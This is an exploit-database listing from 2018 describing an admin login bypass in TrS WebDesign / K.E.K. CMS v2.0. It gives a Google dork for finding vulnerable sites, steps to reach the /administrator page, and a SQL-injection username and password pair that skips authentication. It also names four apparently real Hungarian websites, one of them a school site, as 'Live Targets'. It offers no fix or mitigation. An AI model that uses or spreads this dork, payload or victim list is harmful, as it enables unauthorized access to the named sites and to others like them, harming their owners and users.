TrS WebDesign Hungarian Admin Login Page Bypass Vulnerability

2018.02.11
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

########################## # Exploit Title: Hungarian Admin Login Page Bypass # Google Dork : intext:"Publikálta: TrS WebDesign" # Date: 2018-02-09 # Exploit Author: Iran Cyber Security Group # Discovered By: Black.Butterfly # Version: K.E.K. CMS v2.0 # Tested on : Windows ########################## Search dork and select Target. Put [/administrator & /admin ] After url such as : # http://site.com/administrator # Now enter fill username and Password like the information below : # Username : '=' 'or' # Password : '=' 'or' ############################ # Demo : http://www.Target.com/administrator ############################ Live Targets: *http://www.farkasdombtajhaz.hu/administrator/ *http://ceri.hu/administrator/ *http://somogyi-abony.sulinet.hu/administrator/ *https://magyargepet.hu/administrator/ ############################# # Discovered By: Black.Butterfly # WWW.iran-Cyber.Net


Vote for this issue:
80%
20%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top